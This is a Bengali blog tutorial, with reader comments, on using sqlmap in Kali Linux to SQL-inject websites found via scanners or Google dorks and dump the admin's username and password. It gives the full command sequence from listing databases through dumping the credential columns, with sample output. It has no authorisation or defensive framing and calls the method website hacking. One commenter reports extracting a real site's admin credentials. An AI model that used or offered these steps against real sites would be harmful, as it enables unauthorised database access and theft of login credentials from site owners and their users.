[ কালি লিনাক্স ] Sqlmap দিয়ে SQL Injection করে বের করুন ওয়েবসাইটের এডমিনের ইউজার নেম আর পাসওয়ার্ড !

আসসালামু আলাইকুম !! কেমন আছেন সবাই ? আমি Emran আছি আপনাদের সাথে !! আজ আমরা শিখবো Sqlmap দিয়ে কিভাবে auto SQL injection  করে ওয়েবসাইট এর ডাটাবেস থেকে এডমিন এর ইউজার নেম এবং পাসওয়ার্ড বের করতে হয় !

 

ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি হল SQL Injection !

আজকে আপনাদের দেখাবো Sqlmap এর কাজ ! যা কালি লিনাক্সে আগে থেকেই বিদ্যমান ! কোনো সাইট  SQL Injection এর যোগ্য কিনা তা জানতে  Kali Linux এর ক্ষেত্রে Vega,Power Fuzzar ব্যবহার করতে পারেন !

অথবা গুগল ডর্ক ব্যবহার করতে পারেন !!

আচ্ছা ধরেন আপনি একটা ওয়েবসাইট পেয়েছেন যেটা SQL Injection  এর যোগ্য ! ঊপরের সফটওয়্যার গুলু বলে দিবে আপনাকে যে ঐ ওয়েবসাইট এর কোন লিঙ্কটা Vulnerable !

তাহলে ঐ ওয়েবসাইট এর Link টা হবে এমন : http://www.yoursite.com/index.php?id=32 !

 

এখন আপনার কাজ হল কালি লিনাক্স ওপেন করে  টার্মিনাল ওপেন করা ! প্রথমে আমরা ডাটাবেস বের করব তারপর টেবিল তারপর কলাম তারপর সেগুলু দেখব ডাম্প করার মাধ্যমে !

তাহলে আমরা টার্মিনালে লিখবঃ    sqlmap -u http://www.yoursite.com/index.php?id=32 --dbs

তারপর

আপনার কাছে কিছু জানতে চাইতে পারে ! ভালভাবে পড়ে দেখুন কি জানতে চাচ্ছে ! যদি না বুঝেন সমস্যা নাই ! লাইন এর লাস্টে দেখুন (Y/n) অথবা (y/N) এমন আসবে ! যেটা বড় হাতের হবে সেটা লিখুন !

উদাহরন ১ : Scan all directory (Y/n) Y  বড় হাতের তাহলে Y লিখে  Enter চাপুন !

উদাহরন ২ : Cancle Scane (y/N) N  বড় হাতের তাহলে N লিখে  Enter চাপুন !

 

কিছুক্ষন কাজ হবে ! তারপর আপনার সামনে হাজির হবে ঐ ওয়েবসাইট এর ডাটাবেস !

এমন :

*information_schema

*yoursite

তারপর

আমরা টার্মিনালে লিখবঃ

sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite --tables

ভেঙ্গে বলতে হবে ??

টেবিল পাবো এমন :

user

files

admin

email

 

তারপর

আমরা টার্মিনালে লিখবঃ

sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite -T admin --columns

 

 

 

কলাম পাবো এমন :

admin_username

admin_password

 

তারপর

আমরা টার্মিনালে লিখবঃ

sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_username --dump

 

[           Username        ]

[                                      ]

[             BOLOD           ]

[                                     ]

 

একই ভাবে পাসওয়ার্ড বের করব :

আমরা টার্মিনালে লিখবঃ

sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_password --dump

 

 

[            Password         ]

[                                      ]

[             123456           ]

[                                     ]

কারো প্রশ্ন থাকলে করতে পারেন ! আর অনেকেই বলবেন হাভিঝ দিয়ে ইজি ! কিন্তু হাভিঝ দিয়ে অনেক সাইট এর ডাটাবেস আসে না ঝামেলা করে !

এটা একদম নতুনদের জন্য নয় ! আর ট্রাই না করে " কাজ করে না এই সেই " টিউমেন্ট করবেন না দয়া করে ! আগে ট্রাই করুন ১০০% কাজ করবে !

 

আমাকে ফেসবুকে ফলো করতে পারেন : Emran সবাইকে ধন্যবাদ !

Do Not Copy ! Copying Don't Make You Writer !  😉 

কেমন লাগলো জানাবেন !! ধন্যবাদ !

Level 0

আমি ইমরান হোসাইন। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 9 বছর 6 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 13 টি টিউন ও 46 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 2 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

আসসালামু-আলাইকুম ! আমি মোঃ ইমরান হোসাইন । আমি University Of Asia Pacific এ CSE তে পড়ি ! হ্যাকিং - ক্র্যাকিং নিয়ে আমার খুব আগ্রহ সেই থেকে আপনাদের জন্য আমার লিখা (আমি হ্যাকার না ) ! শুধুই একজন শিক্ষার্থী ! যাদের এসব আমার মতো ভালো লাগে তারা আমার পোষ্ট নিয়মিত পড়বেন...


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

thanks i will try it

site er sonkha onek kom

Level 2

Awesome 🙂

কাজ করে। আমি একটা সাইটের অ্যাডমিনের ইউজারনেরম আর পাসওয়ার্ড বের করেছিলাম, কিন্তু কিভাবে সাইটে লগইন করব সেটাই বুঝতে পারছিলাম না